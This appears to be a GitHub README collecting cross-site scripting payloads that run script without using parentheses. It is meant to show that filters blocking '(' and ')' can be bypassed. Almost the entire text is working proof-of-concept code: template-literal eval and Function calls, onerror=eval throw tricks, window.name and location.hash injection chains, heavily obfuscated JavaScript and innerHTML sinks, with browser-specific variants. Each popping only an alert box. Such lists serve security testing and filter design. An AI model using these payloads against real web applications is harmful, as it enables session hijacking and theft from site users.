XSS-Payloads
XSS Without parentheses ()
This repo contains XSS payloads that don't require parentheses, collected from tweets, blogs... They show that a filter which only strips or blocks `(` and `)` does not stop script execution.
All the PoCs display an alert box with the number 23.
alert`23`
window.name="javascript:alert(23)";
location="xss.html";
xss.html
location=name
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`
onerror=alert;throw 23;
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
Chrome only (credit: Garethheyes)
onerror=eval;throw'=alert\x2823\x29';
{onerror=alert}throw 23
[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}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}$```//Function(alert(1))
xss_redir.html
window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';
xss_short.html
{onerror=eval}throw/0/+name
example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;
throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]
window.name="alert(23)";
location="xss.html";
xss.html
Function`a${name}```
Put %0aalert(/23/)//
anywhere in the URL
location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location
x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x
example.com/xss?%0aalert(/23/)//
Function`a${unescape. call`${location}`}```
onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';
onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"
throw/**/Uncaught=window.onerror=eval,";alert\5023\51"
x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x
Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```
range = document.createRange``;
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;
Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```
window.name="alert(23)"
location="xss.html"
xss.html
eval.constructor`eval\x28name\x29```
window.name="alert(23)"
location="xss.html"
xss.html
[].every.call`eval\x28name\x29${eval}`
[]["filter"]["constructor"]`alert\x2823\x29```
Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];
x='javascript:alert\x2823\x29';x={x:location}=this
window.name="alert(23)"
location="xss.html"
xss.html
eval.call`${top.name}`
window.name="<img src=x onerror=alert(23)>"
location="xss.html"
xss.html
document.write`${top.name}`
location="https://example.com/xss.html/.source;alert(23)?xss="
example.com
eval.call`${location.pathname}`
Firefox only (credit: Garethheyes)
{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}
example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message
https://demo.vwzq.net/lol.html
<script/id=Uncaught>
// chrome + firefox
throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e
</script>
<script>
// firefox
onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1
</script>
<script>
// chrome + firefox
Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]
</script>
<script>
// chrome
[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']
</script>
<script>
// chrome
onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol
</script>
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.body.innerHTML="<img src=x onerror=alert(23)>"
document.body.innerHTML=document.body.innerText
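If the page is frameable, i.e. it sends no `X-Frame-Options` header or CSP `frame-ancestors` directive that forbids framing (credit: Renwa)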
data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">
document.location='javascript:alert%2823%29'
IE only (credit: matt)
example.com/xss#<img src=x onerror=alert(23)>
document.body.innerHTML=location.hash;
<svg/onload='alert( 23 )'>
location=/javascript:alert%2823%29/.source;
http://example.com/?test=<img/src="x"/onerror=alert(23)>
document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;
Anything: @RenwaX23
Source:
https://github.com/RenwaX23/XSS-Payloads/edit/master/Without-Parentheses.md